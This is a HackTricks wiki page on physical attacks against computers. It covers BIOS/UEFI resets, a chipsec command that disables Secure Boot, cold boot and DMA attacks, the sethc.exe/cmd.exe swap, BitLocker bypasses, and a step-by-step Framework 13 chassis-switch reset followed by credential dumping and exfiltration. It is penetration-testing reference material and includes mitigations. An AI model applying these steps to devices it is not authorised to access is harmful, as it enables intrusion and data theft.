Physical Attacks

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

BIOS Password Recovery and System Security

Resetting the BIOS can be achieved in several ways. Most motherboards include a battery that, when removed for around 30 minutes, will reset the BIOS settings, including the password. Alternatively, a jumper on the motherboard can be adjusted to reset these settings by connecting specific pins.

For situations where hardware adjustments are not possible or practical, software tools offer a solution. Running a system from a Live CD/USB with distributions like Kali Linux provides access to tools like killCmos and CmosPWD, which can assist in BIOS password recovery.

In cases where the BIOS password is unknown, entering it incorrectly three times will typically result in an error code. This code can be used on websites like https://bios-pw.org to potentially retrieve a usable password.

UEFI Security

For modern systems using UEFI instead of traditional BIOS, the tool chipsec can be utilized to analyze and modify UEFI settings, including the disabling of Secure Boot. This can be accomplished with the following command:

bash
python chipsec_main.py -module exploits.secure.boot.pk

RAM Analysis and Cold Boot Attacks

RAM retains data briefly after power is cut, usually for 1 to 2 minutes. This persistence can be extended to 10 minutes by applying cold substances, such as liquid nitrogen. During this extended period, a memory dump can be created using tools like dd.exe and volatility for analysis.


Direct Memory Access (DMA) Attacks

INCEPTION is a tool designed for physical memory manipulation through DMA, compatible with interfaces like FireWire and Thunderbolt. It allows for bypassing login procedures by patching memory to accept any password. However, it's ineffective against Windows 10 systems.


Live CD/USB for System Access

Changing system binaries like sethc.exe or Utilman.exe with a copy of cmd.exe can provide a command prompt with system privileges. Tools such as chntpw can be used to edit the SAM file of a Windows installation, allowing password changes.

Kon-Boot is a tool that facilitates logging into Windows systems without knowing the password by temporarily modifying the Windows kernel or UEFI. More information can be found at https://www.raymond.cc.


Handling Windows Security Features

Boot and Recovery Shortcuts

  • Supr: Access BIOS settings.
  • F8: Enter Recovery mode.
  • Pressing Shift after the Windows banner can bypass autologon.

BAD USB Devices

Devices like Rubber Ducky and Teensyduino serve as platforms for creating bad USB devices, capable of executing predefined payloads when connected to a target computer.

Volume Shadow Copy

Administrator privileges allow for the creation of copies of sensitive files, including the SAM file, through PowerShell.


Bypassing BitLocker Encryption

BitLocker encryption can potentially be bypassed if the recovery password is found within a memory dump file (MEMORY.DMP). Tools like Elcomsoft Forensic Disk Decryptor or Passware Kit Forensic can be utilized for this purpose.


Social Engineering for Recovery Key Addition

A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.


Exploiting Chassis Intrusion / Maintenance Switches to Factory-Reset the BIOS

Many modern laptops and small-form-factor desktops include a chassis-intrusion switch that is monitored by the Embedded Controller (EC) and the BIOS/UEFI firmware. While the primary purpose of the switch is to raise an alert when a device is opened, vendors sometimes implement an undocumented recovery shortcut that is triggered when the switch is toggled in a specific pattern.

How the Attack Works

  1. The switch is wired to a GPIO interrupt on the EC.
  2. Firmware running on the EC keeps track of the timing and number of presses.
  3. When a hard-coded pattern is recognised, the EC invokes a mainboard-reset routine that erases the contents of the system NVRAM/CMOS.
  4. On next boot, the BIOS loads default values – supervisor password, Secure Boot keys, and all custom configuration are cleared.

Once Secure Boot is disabled and the firmware password is gone, the attacker can simply boot any external OS image and obtain unrestricted access to the internal drives.

Real-World Example – Framework 13 Laptop

The recovery shortcut for the Framework 13 (11th/12th/13th-gen) is:

text
Press intrusion switch  →  hold 2 s
Release                 →  wait 2 s
(repeat the press/release cycle 10× while the machine is powered)

After the tenth cycle the EC sets a flag that instructs the BIOS to wipe NVRAM at the next reboot. The whole procedure takes ~40 s and requires nothing but a screwdriver.

Generic Exploitation Procedure

  1. Power-on or suspend-resume the target so the EC is running.
  2. Remove the bottom cover to expose the intrusion/maintenance switch.
  3. Reproduce the vendor-specific toggle pattern (consult documentation, forums, or reverse-engineer the EC firmware).
  4. Re-assemble and reboot – firmware protections should be disabled.
  5. Boot a live USB (e.g. Kali Linux) and perform usual post-exploitation (credential dumping, data exfiltration, implanting malicious EFI binaries, etc.).

Detection & Mitigation

  • Log chassis-intrusion events in the OS management console and correlate with unexpected BIOS resets.
  • Employ tamper-evident seals on screws/covers to detect opening.
  • Keep devices in physically controlled areas; assume that physical access equals full compromise.
  • Where available, disable the vendor “maintenance switch reset” feature or require an additional cryptographic authorisation for NVRAM resets.

References

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks